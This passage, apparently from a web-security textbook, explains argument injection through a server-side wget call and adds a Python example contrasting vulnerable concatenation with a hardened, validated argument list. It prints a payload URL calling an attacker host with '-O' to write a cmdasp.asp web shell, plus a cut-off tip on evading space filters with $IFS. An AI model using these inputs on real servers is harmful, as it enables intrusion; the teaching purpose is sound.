application may contain a function in which the server retrieves a user-specified URL and renders its contents in-browser for editing. If the application simply calls out to the wget program, then you may be able to write arbitrary file contents to the server's file system by appending the -O command-line parameter used by wget. For example:

url=http://wahh-attacker.com/%20-O%20c:\inetpub\wwwroot\scripts\cmdasp.asp
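The following added example (not from the book) shows why the injected -O works and how a defender closes it off. The vulnerable path concatenates the URL into a shell command string, so a space in the URL becomes an argument separator and wget sees -O as its own option; the hardened path validates the URL, passes arguments as a list with no shell, fixes the output path server-side, and places a literal "--" before the URL so option parsing stops. The URLs, paths and function names are constructed for illustration; the example only builds argument vectors and does not run wget.

```python
import shlex
import subprocess
from urllib.parse import urlsplit

# Constructed sample inputs (added example, not from the book): the decoded
# form of a URL carrying an injected wget option, and a benign URL.
INJECTED_URL = "http://attacker.example/ -O /var/www/html/injected.txt"
BENIGN_URL = "http://docs.example/page.html"


def vulnerable_command(url):
    """Build the command the way the vulnerable application does: plain
    string concatenation handed to a shell, so every space in `url`
    becomes an argument separator."""
    return "wget " + url


def argv_as_shell_sees_it(url):
    """Tokenise the concatenated command the way /bin/sh would, to show
    which arguments wget actually receives."""
    return shlex.split(vulnerable_command(url))


def validate_url(url):
    """Accept only a plain http(s) URL with a host; reject whitespace and a
    leading dash so the value can never be read as a separate option."""
    if not url or url.startswith("-") or any(ch.isspace() for ch in url):
        return False
    parts = urlsplit(url)
    return parts.scheme in ("http", "https") and bool(parts.netloc)


def safe_fetch_argv(url, dest):
    """Hardened form: validated URL, output path chosen by the server, no
    shell (argument list), and "--" so wget stops option parsing before
    the user-controlled value."""
    if not validate_url(url):
        raise ValueError("rejected URL: %r" % url)
    return ["wget", "-O", dest, "--", url]


def run_safe_fetch(url, dest):
    """Execute the hardened command. subprocess.run with a list never
    invokes a shell, so the URL reaches wget as exactly one argv entry."""
    return subprocess.run(safe_fetch_argv(url, dest), check=True)


if __name__ == "__main__":
    print("vulnerable argv:", argv_as_shell_sees_it(INJECTED_URL))
    print("hardened argv:  ", safe_fetch_argv(BENIGN_URL, "/tmp/fetched.html"))
```

In the vulnerable form the injected value splits into four tokens, with -O and the attacker-chosen path arriving as separate arguments; in the hardened form the same input is rejected before any command is built, and even a value that passed validation could only ever be the single positional URL argument.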
TIP

Many command injection attacks require you to inject spaces to separate command-line arguments. If you find that spaces are being filtered by the application, and the platform you are attacking is Unix-based, you may be able to use the $IFS